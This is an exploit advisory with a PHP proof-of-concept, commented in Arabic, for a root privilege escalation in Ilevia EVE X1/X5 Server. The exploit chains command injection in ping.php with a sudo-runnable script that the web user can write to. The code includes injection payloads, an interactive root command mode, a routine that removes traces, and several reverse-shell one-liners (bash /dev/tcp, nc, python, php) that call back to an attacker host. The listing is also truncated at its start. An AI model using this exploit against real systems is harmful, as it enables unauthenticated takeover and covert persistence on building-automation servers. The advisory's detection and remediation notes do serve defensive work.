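=============================================================================================================================================
| # Title : Ilevia EVE X1/X5 Server 4.7.18.0.eden Root Privilege Escalation Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.ilevia.com |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211593/ & CVE-2025-34514 (the banner printed by the PoC below says CVE-2025-34515; confirm the identifier against the CVE record before citing it)
[+] Summary : A critical privilege escalation vulnerability exists in Ilevia EVE X1/X5 Server versions ≤ 4.7.18.0.eden. It combines two weaknesses: a command injection in the web interface (as exercised by the PoC, through the `ip` parameter of /ajax/php/ping.php) and an improper sudoers configuration (the PoC runs /home/ilevia/www-config/http/emlite/sync_project.sh through sudo as the www-data web user after appending to that same script, which implies the script is writable by the account that is allowed to run it as root). Together they allow the www-data web user to execute arbitrary commands as root without authentication, leading to complete system compromise. For triage, the listing below leaves the following traces: lines appended to sync_project.sh, the files /tmp/exploit.sh, /tmp/cmd_*.sh, /tmp/result.txt and /tmp/output.txt, requests to /ajax/php/ping.php whose `ip` value contains shell metacharacters, and requests to /ajax/php/dbcheck.php with a `db_log` path under /tmp. Note that the listing's own cleanup step removes the /tmp files and the appended script lines, so web-server access logs are the more durable source. The root cause to fix is twofold: validate the `ip` value before it reaches a shell, and make sure no sudoers entry points at a file the web user can modify.
(Note: in this copy the start of the listing is missing, including the opening PHP tag, the class declaration and the beginning of the constructor; the code below begins mid-constructor.)
[+] POC : * Usage: php ilevia_exploit.php target_url = rtrim($target_url, '/'); $this->session = curl_init(); curl_setopt_array($this->session, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 30, CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36', ]); } private function request($path, $data = [], $method = 'POST') { $url = $this->target_url . $path; curl_setopt($this->session, CURLOPT_URL, $url); if ($method === 'POST') { curl_setopt($this->session, CURLOPT_POST, true); curl_setopt($this->session, CURLOPT_POSTFIELDS, http_build_query($data)); } else { curl_setopt($this->session, CURLOPT_POST, false); if (!empty($data)) { $url .= '?' . 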
http_build_query($data); curl_setopt($this->session, CURLOPT_URL, $url); } } $response = curl_exec($this->session); return $response; } /** * استخدام ثغرة حقن الأوامر في ping.php لكتابة أمر في السكريبت */ public function injectCommand($command) { echo "[*] حقن الأمر في السكريبت...\n"; // تحويل الأمر إلى صيغة آمنة للنص $encoded_cmd = base64_encode($command); $payload = "echo '#!/bin/bash' > /tmp/exploit.sh && "; $payload .= "echo 'echo \"" . addslashes($encoded_cmd) . "\" | base64 -d | bash' >> /tmp/exploit.sh && "; $payload .= "chmod +x /tmp/exploit.sh && "; $payload .= "echo 'id' >> /home/ilevia/www-config/http/emlite/sync_project.sh && "; $payload .= "echo 'bash /tmp/exploit.sh' >> /home/ilevia/www-config/http/emlite/sync_project.sh"; $response = $this->request('/ajax/php/ping.php', [ 'ip' => "$(bash -c \"" . addslashes($payload) . "\")" ]); if ($response !== false && trim($response) === '0') { echo "[+] تم حقن الأمر بنجاح\n"; return true; } echo "[-] فشل في حقن الأمر\n"; return false; } /** * تنفيذ السكريبت المعدل باستخدام sudo */ public function executePrivileged() { echo "[*] تنفيذ السكريبت بصلاحيات الجذر...\n"; $response = $this->request('/ajax/php/ping.php', [ 'ip' => "$(sudo /home/ilevia/www-config/http/emlite/sync_project.sh > /tmp/result.txt 2>&1 && cat /tmp/result.txt)" ]); if ($response !== false) { echo "[+] تم التنفيذ بنجاح\n"; // محاولة قراءة النتيجة $result = $this->request('/ajax/php/dbcheck.php', [ 'db_log' => '/tmp/result.txt' ]); if ($result) { $data = json_decode($result, true); if (isset($data['error'])) { return $data['error']; } } return $response; } return false; } /** * تنفيذ أمر مباشر باستخدام السكريبت */ public function executeCommand($command) { echo "[*] إعداد وتنفيذ الأمر: $command\n"; // إنشاء سكريبت استغلال مؤقت $temp_script = "/tmp/cmd_" . md5(uniqid()) . 
".sh"; $payload = "#!/bin/bash\n"; $payload .= "echo 'echo \\\"Executing as: \\$(id)\\\"' > $temp_script\n"; $payload .= "echo '$command' >> $temp_script\n"; $payload .= "chmod +x $temp_script\n"; $payload .= "sudo bash $temp_script > /tmp/output.txt 2>&1\n"; $payload .= "cat /tmp/output.txt"; $response = $this->request('/ajax/php/ping.php', [ 'ip' => "$(bash -c \"" . addslashes($payload) . "\")" ]); // قراءة المخرجات $output = $this->request('/ajax/php/dbcheck.php', [ 'db_log' => '/tmp/output.txt' ]); if ($output) { $data = json_decode($output, true); if (isset($data['error']) && !empty(trim($data['error']))) { return $data['error']; } } return $output ?: $response; } /** * استغلال مباشر للحصول على shell عكسي */ public function reverseShell($lhost, $lport) { echo "[*] محاولة الحصول على shell عكسي على $lhost:$lport\n"; $payloads = [ // bash reverse shell "bash -i >& /dev/tcp/$lhost/$lport 0>&1", // nc reverse shell "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc $lhost $lport >/tmp/f", // python reverse shell "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"$lhost\",$lport));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'", // php reverse shell "php -r '\$sock=fsockopen(\"$lhost\",$lport);exec(\"/bin/bash <&3 >&3 2>&3\");'", ]; foreach ($payloads as $i => $payload) { echo "[*] محاولة payload #" . ($i+1) . "\n"; $result = $this->executeCommand($payload); if ($result !== false) { echo "[+] تم إرسال payload بنجاح\n"; echo "[i] استمع على: nc -lvnp $lport\n"; return true; } sleep(2); } echo "[-] فشل جميع محاولات reverse shell\n"; return false; } /** * اختبار الاتصال بالهدف */ public function testConnection() { echo "[*] اختبار الاتصال بالهدف...\n"; try { $response = $this->request('/ajax/php/ping.php', [ 'ip' => '127.0.0.1' ]); if ($response !== false && trim($response) === '0') { echo "[+] الهدف متاح ويستجيب\n"; return true; } } catch (Exception $e) { echo "[-] خطأ في الاتصال: " . $e->getMessage() . 
"\n"; } return false; } /** * تنظيف الآثار */ public function cleanup() { echo "[*] تنظيف الآثار...\n"; $cleanup_cmd = "rm -f /tmp/exploit.sh /tmp/result.txt /tmp/output.txt /tmp/cmd_*.sh; "; $cleanup_cmd .= "sed -i '/^id$/d' /home/ilevia/www-config/http/emlite/sync_project.sh; "; $cleanup_cmd .= "sed -i '/^bash \\/tmp\\/exploit\\.sh$/d' /home/ilevia/www-config/http/emlite/sync_project.sh"; $this->request('/ajax/php/ping.php', [ 'ip' => "$(bash -c \"" . addslashes($cleanup_cmd) . "\")" ]); echo "[+] تم التنظيف\n"; } public function __destruct() { curl_close($this->session); } } // واجهة سطر الأوامر function printBanner() { echo "=============================================\n"; echo " Ilevia EVE X1/X5 Privilege Escalation Exploit\n"; echo " CVE-2025-34515 - by indoushka \n"; echo "=============================================\n\n"; } function printUsage() { echo "الاستخدام:\n"; echo " php " . basename(__FILE__) . " [options]\n\n"; echo "الخيارات:\n"; echo " --test اختبار الاتصال فقط\n"; echo " --cmd تنفيذ أمر واحد\n"; echo " --shell الحصول على reverse shell\n"; echo " --interactive وضع تفاعلي\n\n"; echo "أمثلة:\n"; echo " php ilevia_exploit.php http://192.168.1.100:8080 --test\n"; echo " php ilevia_exploit.php http://target.com --cmd \"cat /etc/passwd\"\n"; echo " php ilevia_exploit.php http://target.com --shell 192.168.1.50:4444\n"; } // التنفيذ الرئيسي if (php_sapi_name() !== 'cli') { die("هذا الاستغلال يعمل فقط من سطر الأوامر (CLI)\n"); } if ($argc < 2) { printBanner(); printUsage(); exit(1); } $target = $argv[1]; $exploit = new IleviaExploit($target); printBanner(); // اختبار الاتصال أولاً if (!$exploit->testConnection()) { echo "[-] الهدف غير متاح\n"; exit(1); } // معالجة الخيارات if ($argc >= 3) { switch ($argv[2]) { case '--test': echo "[+] اختبار الاتصال ناجح\n"; exit(0); case '--cmd': if ($argc >= 4) { $command = $argv[3]; echo "[*] تنفيذ الأمر: $command\n"; $result = $exploit->executeCommand($command); if ($result !== false) { echo "\n[+] النتيجة:\n"; 
echo "================================\n"; echo $result . "\n"; echo "================================\n"; } else { echo "[-] فشل التنفيذ\n"; } } break; case '--shell': if ($argc >= 4) { list($lhost, $lport) = explode(':', $argv[3]); $exploit->reverseShell($lhost, $lport); } break; case '--interactive': echo "[*] الانتقال للوضع التفاعلي\n"; echo "[i] اكتب 'exit' للخروج أو 'clean' للتنظيف\n\n"; while (true) { echo "ilevia> "; $command = trim(fgets(STDIN)); if ($command === 'exit') { break; } elseif ($command === 'clean') { $exploit->cleanup(); continue; } elseif (empty($command)) { continue; } $result = $exploit->executeCommand($command); if ($result !== false) { echo "\n" . $result . "\n\n"; } else { echo "[-] فشل التنفيذ\n"; } } break; default: printUsage(); exit(1); } } else { // الوضع الافتراضي: عرض خيارات sudo المتاحة echo "[*] جلب صلاحيات sudo للمستخدم www-data...\n"; $result = $exploit->executeCommand("sudo -l"); if ($result !== false) { echo "\n[+] صلاحيات sudo:\n"; echo "================================\n"; echo $result . "\n"; echo "================================\n"; } echo "\n[i] للمزيد من الخيارات، استخدم --help\n"; } // تنظيف خفيف في النهاية $exploit->cleanup(); echo "\n[+] انتهى التنفيذ\n"; ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================